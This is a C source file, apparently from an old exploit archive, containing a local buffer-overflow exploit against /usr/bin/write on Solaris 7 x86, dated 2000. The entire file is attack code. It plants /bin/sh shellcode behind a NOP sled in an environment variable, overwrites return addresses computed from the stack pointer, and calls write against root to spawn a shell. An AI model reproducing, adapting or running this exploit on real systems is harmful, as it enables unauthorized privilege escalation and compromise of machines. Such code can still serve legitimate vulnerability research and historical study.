#include #include /* /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 psor@afip.gov.ar usage: write-exp [shell_offset] [ret_addr_offset] default offset should work. */ long get_esp() { __asm__("movl %esp,%eax"); } char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff" "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46" "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0" "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52" "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff" "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08" "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b" "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8" "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; /* shellcode by Cheez Whiz */ void main(int argc,char **argv) { FILE *fp; long magic,magicret; char buf[100],*envi; int i; envi = (char *) malloc(1000*sizeof(char)); memset(envi,0x90,1000); memcpy(envi,"SOR=",4); memcpy(envi+980-strlen(shell),shell,strlen(shell)); envi[1000]=0; putenv(envi); if (argc!=3) { magicret = get_esp()+116; magic = get_esp()-1668; } else { magicret = get_esp()+atoi(argv[1]); magic = get_esp()+atoi(argv[2]); } memset(buf,0x41,100); buf[99]=0; memcpy(buf+91,&magic,4); for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4); execl("/usr/bin/write","write","root",buf,(char *)0); } /* www.hack.co.za [25 January 2001]*/